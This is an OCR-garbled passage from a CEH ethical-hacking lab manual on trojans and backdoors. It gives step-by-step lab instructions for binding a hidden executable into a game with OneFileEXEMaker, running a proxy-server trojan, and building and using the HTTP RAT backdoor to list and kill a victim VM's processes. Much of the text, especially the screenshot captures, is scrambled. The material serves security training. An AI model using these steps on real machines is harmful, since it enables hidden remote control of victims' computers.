r
Pack Fies?
FIGURE 3.5: Setting Lazaris open mode
6. Click Save and browse to save die tile on the desktop, and name die tile Tetris.exe.
CEH L ab Manual Page 442 442
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Save Save n | K 1
-» * 0
Name * e-mail:
sennas
2[
I - I Size
0
1*1 Type
®
a
1*1 Date modified
1
^Pubk :■ Comp Compute uterr 4* Network Network ®MoziaFrefbx £ Google Chrome
1KB Shortcut 2 KB Shor Shortcu tcutt
9/18/2012 2:31 Af 9/18/2012 2:30 AT
_ l Short File Name
± 1
|------ Save------ 1 (Executa bles (*.exe)
MCAFEE.EXE
_^J
Cancel
|
Save L Copyright (C), 1998-2000. By Senna Spy
Open Mode (• Normal C Maximized C Minimized C Hide
Copy To C Windows (* System (" Temp C Root
(• Open/Execute C Copy 0n|y
r
Pack Pack Fies? Fies?
FIGURE 3.6: Trojan created MCAFEE.EXE MCAFEE.E XE will run in backgro background und m
7. N ow double-click double-click to open die Tetris.exe file. Tliis will launch die Lazaris , g am€> 011 011 th e tr0 11 t e
, d•
r FIGURE 3.7: La 2aris game
8.
CEH L ab Manual Page 443 443
Now open Task Manager and click die Processes tab to check it McAfee is running.
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
^
£J Windows Task Manager File
Options
View
Applications
Processes
I m ag a g e .. .
[* [
Help
jServices | Performance j Networking | Users |
1 Us Use r N am e 1[ c
pu
Description n ] Memory (... | Descriptio
c srs s . e x e
SYSTEM
00
1 .4 6 4 K
Client Ser...
c srs s . e x e
SYSTEM
00
1 . 73 73 6 K
C lili en en t S e r .... .
d w m .e x e
A d m l n is t . ..
00
1 ,2 0 0 K
e x p lo re r.e x e
A d m m i s t. ..
00
14,804 K
| 1
D e s k to p . .. W in d o w s . . .
LAZARIS.EXE ...
A d m ln i s t. . .
00
1 .5 4 0 K
LAZAR IS
Isass.exe
SYSTEM
00
3 ,1 0 0 K
Local S e c u . . . -
Is m .ex e
SYSTEM
00
1.38 84 4K
L oc oc al al S es es s. s. .. ..
A d m ns ns t . . .
00
580 K
N E T W O .. .
00
2 .8 3 2 K
1 MCAFEE.EXE .... . m sd tc.e xe
MCAFEE MS D T C c o . . .
S cr cre en en pr pre s so so .... . .
A dm dm iriri l s t. . .
00
2 8. 8. 3 80 80 K
S cr cr e en en pr pre .... .
s e rv i c e s . e x e
SYSTEM
00
1 .9 9 2 K
S erv ic es a. a. . .
S Ls v c. e xe
N E T W O .. .
00
6 .7 4 8 K
M ic ro s o f t .. .
smss.exe
SYSTEM
00
304 K
Windows ...
spoolsv.exe
SYSTEM
00
3 .5 8 8 K
Spooler S...
svchost.exe
SYSTEM
00
1 3 ,5 08 K
H o s t P ro c . ..
s vc h o s t.e x e
LOCAL . . .
00
3 .6 4 8 K
H o s t P ro c .. .
I*
Show processes from all users
|jPro :ess es: 40
CPU Usage: 2°.c
gnc| process
Physical Mem ory: 43°.c
FIGURE 3.8: MCAFEE in Task manager
Lab An alysis alysis Analyze and document the results related to die lab exercise. Give your opinion 011 your target’s secunty posture and exposure dirough public and free information.
P L E A S E T AL A L K T O Y O U R I N S T R U C T O R I F Y OU OU H A V E Q U E S T I O N S RELATED TO THIS LAB.
T o o l/ l/ U t il il i t y
I n fo fo rm r m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed
E X E M a ke ke r
O u tp t p u t: t: U si sin g a b a c k d o o r execute Tetris.exe
Questions 1. Use various odie r options for die Op en mode, Copy to, Action sections of OneFileEXEMaker and analyze the results. 2. How Ho w you will will secure your compute com puterr from OneFileE XEM aker attac attacks? ks?
CE H Lab M anual Page 444
Ethica l Ha ckin g and Counterm easures Copyrigh Copyrightt © by EC-Council EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Internet Connection Required
□ Yes
0 No
Platform Supported 0 C la l a ss ss rro o om om
CEH L ab Manual Page 445 445
0 iLab Labs
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Proxy Server Serv er Troja Trojan n A. Trojan is a program that co contains ma malicious or harm harmfful code inside ap apparently harmless programming or data in such such a )ray that that it i t can can get get control and and cause cause damag damage, e, such as minin mining g the file file al allocation table on a hard ard drive. ICON
KEY
P~/ Valuable information Test vom knowledge —
Web exercise
m
Work Wo rkbo book ok rev review
Lab Scenario You are a security security administrator o f your company, and your job responsibili responsibilitie tiess include include protecting the network from Trojans and backdoors, Trojan attacks, attacks, theft o f valuable valuable data from the network, and identity theft. theft.
Lab Objectives The objective objective o f tins tins lab is is to help students learn to detect Trojan and backd oor attacks. The objectives of tins lab include: •
Starting McAfee Proxy
•
Accessing the Interne t using McAfee Proxy
Lab Environment To carry out diis, you need: need:
JT Tools Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
McAfee Trojan located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans
■
A compu ter running Window Window Server 2012 (host) Windows Server 200 8 runnin g in virtual machine
■
If you decide to dow nload the latest version, then screenshots shown 111 the lab might differ You need a web browser to access Internet Administrative privile privileges ges to m n tools
Lab Duration Time: 20 Minutes
CEH L ab Manual Page 446 446
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table 011 a hard drive. Note: The versions of the created cclient or host and appearance may differ from
what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab. £
TASK
Proxy server Mca fee
Lab Task Task s 1. In Window s Server 2008 Virtual Machine, navigate navigate to Z:\CEHv8 Module Module 06 Trojans Trojans and Backdoors\Trojans Typ es, and right-click Proxy Server Trojans and select CmdHere from die con text menu. j r a C > Pit
|i■
Edt
* CD -v3 ' teduc05Tro:o ««nd30ccdo0f3 - "rojanaTypes
view
Toos
Orgsncc »
ndp
Vc a s
*
F pi Documents £ Picture* Picture* ^
Mjflic ic •tore
w
S ' s® s® 1 '
Nn • - - C * » n od od r i« i« d M T vp vp # j, Bl*d0«rryT'0)jn J( T'0j*tk ,Jf Canrund 5h*l "rajjin* Jj D*t»c« D*t»c« rw«tT a|arK
M Sat
M
Jf Destruetve Trojans Trojans J t Swoonc Trojans Trojans
»
Folders Mon tor J i Reosrv Mon
_±_
| . Startup P'cgrarr* P'cgrarr* W JA rojansT/pes
3ladd>e ry Trojan | . Comrrand Srel Trt
JtE-f'd JtE-f 'd l r3 :3rs :3rs J k F T i r o jar J t GJ: Trojans JlMTPh-TTFST'Ojans JtlOPBdCWoo j.MACO SXTt oaTS
R=nct c A< J t VMC raja
j. 3ef3Gem ertTro;a•
1 . 3estrjc&'/e “rojor
COer R»stora previOLS versions
J. -banbrgT-qjarts
1.
Ser Serd d To
Trojers
i. '^PT'cjo n
Q it
i . SUIT'ojans SUIT'ojans
C30V
L. - TIP t-rr P5 Tro;a
C eare9xjrtcjt Delete Rename
I, :CKPBdCkdCOr
Proxy Se ver Irojf
Prooenes
Jg \\ 35PtOtv TrQ*
-
. . t in in m i G H
:
►
.
FIGURE 4.1: Windows Server 2008: CmdHere
2. No w typ typee die comman d dir to check for folder contents.
FIGUR E 4.2: Directory listing of Proxy Server folder
3. The Th e following image lists die directories and files files 111 the folder.
CEH L ab Manual Page 447 447
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
-1 | x | Z :\ :\ C E H v8 v8 M o du du le le 0 6 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \ P r o x y S e r v e r T r o j a n s > d i r I U o l u ne ne i n d r i v e Z h a s n o l a b e l . I U o lu lu n e S e r i a l N u m b er er i s 1 6677 77-- 77D DAC I D i r e c t o r y o f Z : \ C E H v8 v8 M o du du l e 0 6 T r o j a n s a n d B a c k d o o r s V T r o j a n s T y p e s \ P r o x y S e r v e Ir Trojans 1 0 9 /1 /1 9 /2 /2 0 1 2 1 0 99// 1 9/ 9/ 2 01 01 2 102/1 7/20 06 109/19/2012
0 1 : 0 7 AM < DI DIR > 0 1 : 0 7 AM < DI DIR > 1 1 : 4 3 AM 5 ,3 2 8 n c a fe e .e x e 0 1 : 0 7 AM < DI DI R> R> W 3 b Pr Pr 0 xxyy T r 0 j 4 n C r 3 4 t 0 r < F u nn nn y N a ne ne > 1 F r iill e <^ ss>; 5b , 3JJ222 8 b y tt eess 3 Dir
208,287 ,793,152 byte s free
Z:\CEHv8 Module 06 Trojans and BackdoorsSTrojans Types\Proxy Server Trojans>—
m
FIGURE 4.3: Contents in Proxy Server folder
Type die command mcafee 8080 to mil the service 111 Windows Server 2008.
FIGURE 4.4: Starting mcafee tool on port 8080
5. The Th e service lias started 011 port 8080. 6. No w go to Windows Server 2012 host machine and contigure the web brow ser to t o access die d ie Inte I nterne rnett 011 port 8080. 7. 111 diis lab launch laun ch Clirome, and select select Settings as shown 111 die following figu figure. re. Q
be m Tliis process can be attained in any browser after setting die LAN settings for die respective browser browser
2 wwwgoogtorofv
* C.pj
lo*r
ico* • O
Google XjnaNCMm-
11-w n• • ... FIGURE 4.5: Internet option of a browser in Windows Server 2012
CEH L ab Manual Page 448 448
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
8. Click the Show advanced settings 1111kto view the Internet settings.
FIGURE 4.6: Advanced Settings of Chrome Browser
9. 111 Network Settings, click Change proxy settings. C I Clvotue Clvotue
0 chrcyncv/dVOflM.'Mttnpt / Settin g s
9« c»rt. VUu) tAdofl 1
4 Enitoir AutaMtc M M l*«Dtom n *u«
Mttmeric Gocgit Owcfnt isw9n«y««»ccm^uKrss>S«m
tc connec tc the rctMOrfc.
| OwypwstBnjt-
(UQMthjt w«n>r 1l*nj 1l*nju*9«I w
it Oownoads
0 01
Covmlaadkcabot: C.'lherrAirnncti rt AT T to>
1
U Ast »hw 10 w «Kt!li t Mm dw»«10><«9 MTTPS/SM.
FIGURE 4.7: Changing proxy settings of Chrome Browser
10. 10. 111 die di e Internet Properties window click LAN settings to configure proxy prox y settings.
CEH L ab Manual Page 449 449
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Internet Properties General [ Security ] Privacy ] Conte nt
Connections | Programs ] Advanced
To set up an Inte rnet connection, dick Setup.
Setup
Dial-up and Virtual Private Network settings
Choose Choose Settings if you need to configure a proxy server for a connection. connection. (•) Never cfal a connection on
O Dial Dial whenever a n etwork connection is not present O Always Always dal my default connectio connection n Current
Sgt default
None
Local Area Netwo rk (LAN) sett ing s ------------------ -----------------------------------LAN Settings do not apply to dial-up connections, Choose Settings above for dial-up settings.
OK
] |
|
LAN setting s
Cancel Cancel J
\
ftpply
FIGURE 4.8 4.8:: LAN Settings Settings of o f a Chrome Browser
11. 111 die di e Local Area Network (LAN) Settings window, select die Use a proxy s erv er for your LAN option 111 the Proxy server section. 12. Ent er die IP address o f Windows Server Server 22008 008,, set die port nu mber to 8080, and click OK. FT
Local Area Network (LAN) Settings
Automatic Automatic configuration configur ation Auto matic conf igura tion may o ver ride manual s ettin gs. To ensu re th e use of manual settings, disable automatic configuration. @ Automatically Automatically detect settings Use automatic configuration script
Address Proxy server Use a proxy server for your LAN (These settings will will not apply to dial-up or VPN connections). Addre ss:
10.0.0.13
Port:
8080
Adv anc ed
I !Bypass prox y serv er for local local addresses! addresses!
OK
Cancel
FIGURE 4.9 4.9:: Proxy settings of LAN in Chrome Browser Browser
13. 13. N ow access access any web page 111 die browser brows er (example: (example: www.bbc.co.uk ))..
CEH L ab Manual Page 450 450
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGUR E 4.1 4.10: 0: Accessing web page using proxy server
14. The Th e web page will open. 15. Now go back to Windows Server 2008 and check die command promp pro mpt. t. A d m in is tr at o r C: \W md ow * \sy *t em 32 \c m d .e x e - m ca fe e 80 80
Accessing web web page m using proxy server
www.google.co : / c o n p l e t e / s e a r c h ? s u g e x p = c h r o m e , n o d = 1 8 & c l i e n t = c h ro ro n e8 e8 r hhll = er er :1 2 0 0 . US8rq=bbc.c US8rq=bbc.c o - | Accepting New Requests ■ w w w . g o o g l e . c o :1 2 0 0 / c o n p le le t e /s /s e a r c h ? su su g e x p = c h r o m e , n o d = 1 8 8 t c l i e n t s c h r o n e 8 r h l = e n l~US&q=bbc.co.u Accepting New Requests ! Accepting New Requests ! A c c e p t i n g Ne w R e q u e ■ * * ^ / c o n p l e t e / s e a r c h ? s u g e x p = c h r o r o e , n o d = 1 8 8 t c l i e n t = c h ro ro n e 8t 8t h l= l= e r l-US&a=bbc.co.uk | / : b b c .c o . u k :1 3 0 1 Hccepting New Kequests ■ Accepting New Requests ■ / :w w w . b b c . c o . u k : 1 2 0 0 Accepting New Requests ! Accepting New Requests■ Accepting New Requests ! Accepting New Requests ! Accepting New Requests ■ Accepting New Requests ! Accepting New Requests ! s t a t i c . b b c i . c o . u k : / fr f r a n e w o r k s / b a r le l e s q u e / 2 . 1 0 . 0 / d e s k t o p / 3 .5 . 5 / s t y le l e / r * a i n .c . c s s :2 0 0 ! Accepting New Requests ■ s t a t i c . b b c i . c o . u k : / b b c d o t c o n / 0 .3 .3 . 1 3 6 / s ty ty l e / 3 p t _ a d s .c . c s s :2 0 0 ! Ac cepting
Ne w R e q u e s t s ! ________ ____________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ____
FIGURE 4.11: Background information on Proxy server
16. You can see diat we had accessed die Internet using die proxy server Trojan.
Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s sea rn tv posture and exposure dirough diroug h public and tree information.
CEH Lab Manual Page 45 451
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reprodu ction is Strictly Prohibited.
Module 06 - Trojans and Backdoors
P L E A S E T AL A L K T O YO YO U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S RELATED TO THIS LAB.
T o o l/ l/ U t il il i t y
I nf nf or or m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed
Proxy Server Trojan
Output: Use the proxy server Trojan to access the Internet Accessed webpage: www.bbc.co.uk
Questions 1. Determine whether McAfee McAfee HTTP Proxy Server Server Trojan supports other ports por ts that tha t are also apart ap art from f rom 8080 8080.. 2. Evaluate the drawbacks of using the HT TP proxy prox y server server Trojan to access access the Internet.
Internet Connection R equired equired 0 Y es
□ No
Platform Supported 0 C la l a ss ss rro o om om
CEH L ab Manual Page 452 452
□ !Labs Labs
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
HTTP Trojan Tro jan A. Trojan is a program that co contains ma malicious or harm harmfful code inside ap apparently harmless programming or data in such such a iray that that it i t can can get get control and and cause cause damag damage, e, such as minin mining g the file file al allocation table on a hard drive. ICON
/' Valuable information S
Test your ______ ___ _ knowledge ____
*
Lab Scenario
KEY
Web exerc exercise ise
£Q! Workbook Wo rkbook review
Hackers have a variety ot motives for installing malevolent software (malware). This types of software tends to yield instant access to the system to continuously steal various types of information from it, for example, strategic company’s designs 01 numbers o f credit credit cards. cards. A backd oor is a program or a set of related programs that a hacker installs 011 the victim computer to allow access to the system at a later time. A backdoor’s goal is to remove the evidence o f initial initial entry from the systems log. Hac ker—dedicated w ebsites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log 111 by entering a predefined pas sword sw ord . You are a Security Security Adm inistrator o f your company, and your job responsibili responsibilities ties include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives The objective objective of tins lab lab is to to help students learn to detect Trojan and backd oor attacks. H T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
The objectives of the lab include: •
To run HTTP Trojan Trojan 011 Windows Server 2008
•
Access the Windows Server Server 2008 2008 machine process list list using the HTT P Proxy
•
Kill Kill running processes 011 Windows Server 2008 Virtual Machine
Lab Environment To carry out diis, you need: need:
CEH L ab Manual Page 453 453
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
HTTP RAT located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Bac kdo ors\T rojan s T ypes\HTTP HTTPS HTTPS Trojans\HTTP Trojans\HTTP RAT RAT TROJ TROJAN AN
■
Window Server 2008 (host) A compu ter nuining Window
Windows 8 nuniing 111 Virtual Maclune
■
Windows Wind ows Server 2008 111 Virtual Machine
■ If you decide decide to download the the latest version, then screenshots shown 111 the lab might differ ■
You need a web browser to access access Intern et
■
Administrative Admin istrative privileges privileges to m n tools
Lab Duration Time: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way diat it can get control and cause damage, such as ruining die file allocation table on a hard dnve. Note: The versions of die created client or host and appearance may differ from
what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab.
Lab Task Task s HTTP RAT
1. Log 111 to Windows 8 Virtual Machine, and select die Start menu by hovering die mouse cursor on die lower-left lower-left corner of die desktop,
u
Rtcytlt Dm
a
*
Mo»itla firefox
Google Chremr
Windows 8 Release Previev. Evaluation copy Build 840C
■>8
FIGURE 5.1: Windows 8 Start menu
2. CEH L ab Manual Page 454 454
Click Services ui the Start menu to launch Services. Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Start
m
Google Chrome
m 9
Video
*
.... 5
Weiner
m
>PP1:1 ■:h e \\" u'.a
services
<3,
rm
■
B
Calendar
Internet Explorer
tfecttop
Uapt
m Wide Web Publisher is mandatory mandat ory as HTTP HTT P RAT runs on port 80
Mozilla Firefox
Slcfe
aS SfcyDrwe
^
_ .
, ,
File
Action
FIGURE 5. 5.2: 2: Windows Windows 8 Start menu Apps _
3. Disable/Stop World Wide Web Publishing Services. View
H«Jp
+ 1H 1H1 Ei a HI 0 a l » Services ;local) World Wide Web Pubfahng Service Nam e 34 W i n d o w s Fi re wal l V/in V/in d cv /s /s Fo n t Cach e Serv Serv ice ice
Description: Provides Web comectr/rty and ad min strato n th ro u g h th e In terret terret Infcrmation Services Manager
Description
Status
S ta ta rt rt up up T yp yp e
W in in d o w s F 1.«
Running
A u to m a t ic
Loc
Op timizes timizes p .... ..
Ru n n in in g
Au to matic matic
Loc
W in in ddo ow wss I m ag ag e A cq cq uuii s it io io . .
P r o vvii de de s im . .
W i n d o w s I n s t a ll e r
A d d s , m o d i .. .
V W in in ddo o ws ws M a n ag ag e me me n t I nnss t.t. . P ro ro vvii de de s a c. c. .
M sn sn uu3 3l R un un nnii ng ng
M e n u sl
Loc
A ut ut om om a titi c
LOC Net
•^W indo ws Media Player Net... Net...
S h a r e s W in ...
M a n ua l
^ W i nd n d oow w s M od od u l e s I n st a ll e r
E n a b l e s in st .. .
M an an u a l
£ $ V/ind V/ind cws Pro cess cess Activ Activ atio atio ...
Th eWin d o ...
£ $ W i n d o w s R e m o t e M a n a g e .. .
W i n d o w s R...
W in in ddo ow wss S e a rc rc h
P rroo vvii d es es CO.-
W in in ddo o ws ws S to to rree Se Se rv rv ic ic e (W5...
Pr oov v id id es es in inf . .
L og og A
Ru n n in in g
Man u al M e n u sl
R un un n in in g
N et
A uutt o ma ma titi c (D._
Loc
M an an uuaa l ( Tn Tn gg... .
LOC
W i n d o w s T im #
M a i n t a i n s d...
M a n u al ( T n g ..
Loc
Q Wi Wi n d o w s U p d a t e
E n a b l e s t h e. e ...
M a n u a l ( T n g .. .
Loc
M a nu nu al al
L oc oc
*% %W W in in HT HT TP TP W eb eb Pr ooxx yA u to to .. W in in HT HT TP TP i . .
R un un nnii ng ng
3% W i r e d A u t o C o n f i g
T h e W i r e d ...
M a n ua l
L0C
'• & WLAN A u t o C o n f i g ■I^WM Performance Adapter
T h e WLANS...
M a n ua l M a n ua l
LOC lo c Nt t
W o rk s t a t i o n P I Wo rld Wid e Web Pu b lnh lnh in ... ... - WWAN AutoConfig
Provide; pe.. C r«a t «c a n d .. .
R un un n i n g
Automatic
Pro vid vid e! W...
Ru n n in in g
Menusl
u M
M a n ua l
LOC v >
T h is se rvi ce . .
<
\ Mended ^Standard/
FIGURE 5.3: Administrative tools -> Services Window
4. Right-click the World Wide Web Publishing service and select Properties to disable the service.
CEH L ab Manual Page 455 455
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Wo rld W ide Web Publishing Publishing Service Service Properties (Loc al.. al... Genera Genera1 1 Log Log On Recovery Recovery Depende Dependencies ncies Service name:
W3SVC
Display name:
World Wide Web Publishing Service Servic e ivides Web connectivity and administration )ugh the Internet Information Services Manager
Description:
Path to executable: C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe -k iissvcs Startup type:
Disabled
Helo me configure service startup options.
Service status:
Stopped Stopped
Start
Stop
Pause
Resume
You can specify the start parameters that apply when you start the service from here Start parameters
OK
Cancel
Apply
FIGURE 5.4: Disable/Stop World Wide Web publishing services
5. N ow start HT TP RAT from die location location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP Trojans\HTT P RAT RAT TROJAN. TROJAN.
HTTP RAT 0.31
□
r V 'k H T T P R A T IUUI The T he send notificati notifi cation on option can be used to send the details to your Mail Mail ID
f -W !backdo !backdoor or Web Webse serrver ver
J
by zOmbie ?J
http://freenet.am/~zombie]] latest version here: [http://freenet.am/~zombie settings W
send notification w ith ip address to mail mail
SMTP server 4 sending mail u can specify several servers delimited with ; smtp. mail. mail. ru;$ome. other, smtp. server ; your email address: |[email protected] I.com co m close FireWalls Create
server port: [80" Exit
FIGURE 5.5: HTTP RAT main window
6. Disable die Send notification with ip address to mail option. 7. Click Create to create a httpserver.exe file.
CEH L ab Manual Page 456 456
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
E ll
HTTP RAT 0.31
/VKHTTP RAT
!backdoor Webserver
I
if■• T
J
h
y 20mb 20mbiie
v0.31
.
1 latest version here: [ http://freenet.am/~zombie http://freenet.am/~zombie]]
seiuriys send notification with ip address to mail| SMTP server 4 sending mail u can specify several servers delimited with ; | smtp. mail. mail. ru;some. other, smtp. server; your email address: |y |y [email protected] close FireWalls |i
Create Create
j|
server port: 180
Exit
_
FIGURE 5.6: Create backdoor
HTTP RAT 0.31 0 2 Tlie Tlie creat created ed httpserver will be placed in the tool directory
/V \H TT P RAT
I -W ^backdoor Webserv Webserver er done! la
r
done send http5erver.exe 2 victim
c OK
|y |yo [email protected] w
close FireWalls
server pork:[
Create
Exit
FIGURE 7. : Backdoor server created successfully
8. Tlie httpserver.exe tile should be created 111 die folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP Trojans\HTT P RAT RAT TROJAN TROJAN
9. Double-cli Dou ble-click ck the tile tile to and click click Run.
CEH L ab Manual Page 457 457
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
HTTP RAT TROJAN
Applicatio n Tool* Tool* Mo mg c
BQ New item
IS □ * "
Im-J Co d / path
0 »«te
to*
Clipboard
o®
I
|
|
Open File le
[g j
htlpscfvcr |
□ D Inrert
Security Warning
Na m e
...TTP HTT PS Tro jans \HT TP RAT TR OJA N\ht tpse rvcr .cxc
~ Publisher: Unkn own Publisher
*S&l Rece nt plac es
Type
1 . r e ad ad m e ^
Select aone
The publisher s her could not bp verified. Are you dire you want to run thk software?
Z ittpiat
4 Downloads
E dit
01
N3 me
D es es kt kt op op
EEs ««t «« t >11
S I O p en en 0
to•
« HTTP HTIPS Trojans >
Favorites ■
*
Easy access
Application
From: Z:\CEHv8 Mod ule06 Trojans and Backdoors Jro jan sT
L Lib ibrar raries ies 1111 Doc ume nts
Cancel
Run
Music B
P i ct ct u re re s
g£ Videos ^3.
Ho meg rro oup
This file file docs no t have valid digital signature that verifies its publisher. You should only run software from publishers you trust
HewcanIderidewh ewcanIderidewhattoftivareto toftivaretom mn?
T® Computer i l . Local Local Oslr (C:) (C:) 4- CEH-Tcols (\\10. Ip Admin (admin(admin-p p 4
items
1item selected iO. : KB
FIGURE 5.8: Running the Backdoor
10 10.. G o to Task Manager and check if die process is mnning. File
Options
Processes
View
Performa nce
Ap p histor y
St artup
Users Users
Details
Services 30%
Name
Status
5 2%
4%
0%
CPU
Memory
Disk
1.9%
6.8 MB
0 MB/s
0 Mbps
0%
25.1 MB
0.1 MB /s
0 M bp s
0%
3.3 MB
0 MB/s
0 Mbps
Network
Apps (2) >
Task Manager
> ^
Windows Windows Exp Explor lorer er
Background processes (9) H
Device Device Association on Framework... Framework...
S I Httpserver (32 bit ) Microsoft Windows Search Inde... t f lf ' Print driver host f o r applications m
Snagit (32 bit)
j[ /) Snagit Editor (32 bit) [■ ] Snagit RPC Helper (32 bit) t> OR) Spooler SubSyste m App
0
TechSmit TechSmith h HTML Help Helper Helper (... (...
0%
1.2 MB
0 MB/s
0 Mbps
0%
4.9 MB
0 MB/s
0 Mbps
0%
1.0 MB
0 MB /s
0 Mbps
19.7%
22.4 MB
0.1 MB/s
0 Mbps
0%
19.2 MB
0 MB/s
0 Mbps
1.7%
0.9 MB
0 MB/s
0 Mbps
0%
1.5 MB
0 MB/s
0 Mbps
0%
0.8 MB
0 MB/s
0 Mbps
W i n d o .*;■ . : ( > f f • , ' t - , ~ : (* ) Fewer Fewer details details
FIGURE 5.9: Backdoor running in task manager
11. Go to Windows Server 2008 2008 and ope n a web browser to access die Windows 8 machine (here “10.0.0.12” is die IP address ot Windows 8 Machine).
CEH L ab Manual Page 458 458
Etliical Ha ckin g and Cou ntenn easure s Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
*Drabe'S KTTP RAT
c | I £« £« iooale
P]
*
D -
welcome 2 IITTP_RAT infected computer }:]
.es] [brov!6«] [brov!6«] [comouter info] [stoo htto rat] [have auaaestions?] auaaestions?] [homeoace] wplrnme }:J
FIGURE 5.10: Access the backdoor in Host web browser
12. Click Click running processes to list the processes runnin g on die d ie Windows 8 machine. Z>nbe' Z>n be'ss HTTP_RAT
1,4■ 1,4■
& 10.0.0. iZproc ___________ ___________
C
? 1 ioojle
P
A
E-
running p rocessez: rocessez: [system Process] Process] S/stem Ikilll srrss.exe [kill]
!] v*‘ninit.exe[M fkilll [ M !] w1nlogon.exe !,killl services.exe services.exe f kill] kass.exe [ki!!] ;vchoctoxQ r < n :vcho5t.exe r!
111
svch ostexe[ e[h jjj]
spoolsv.exe [kilfl svchostexe | kill) svchostexe [kill] d3cHoct.ova f l-illl
MsMpCng.exeIki xeIkill »vc.hus»t.«x« fklin svchostexe [killl 5vchos t.exe [ kiTTj
tackho*!f.®x*» [kill]
t a c U f io c t . o x o [I]!
M p k x a r . t M [ M 1] 1]
searchlndexer.exe fkilfl Snag1t32.exe [joj] TscHelp.exe [kill] S n a g P r i . / . • * * [ k i ll] [I e S n a g it C d it o r . e x dj]
aplmjv164.exeIklll xeIklll]]
svchostexe fktlll httpserver.exe (kill] Taskmor.«»x*
Ik-illl
f ir o f o x O . X O [ U J J ]
FIGURE 5.11: Process list of die victim computer
13. You can kill kill any run running ning processes from here.
Lab An alysis alysis Analyze and document the results related to die lab exercise. Give your opinion on your target’s secuntv posture and exposure dirough public and tree mformadon.
CEH L ab Manual Page 459 459
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
P L E A S E T AL A L K TO T O Y O U R I N S T R U C T O R I F Y O U H A VE VE Q U E S T I O N S RELATED TO THIS LAB.
T o o l/ l/ U t il il i t y
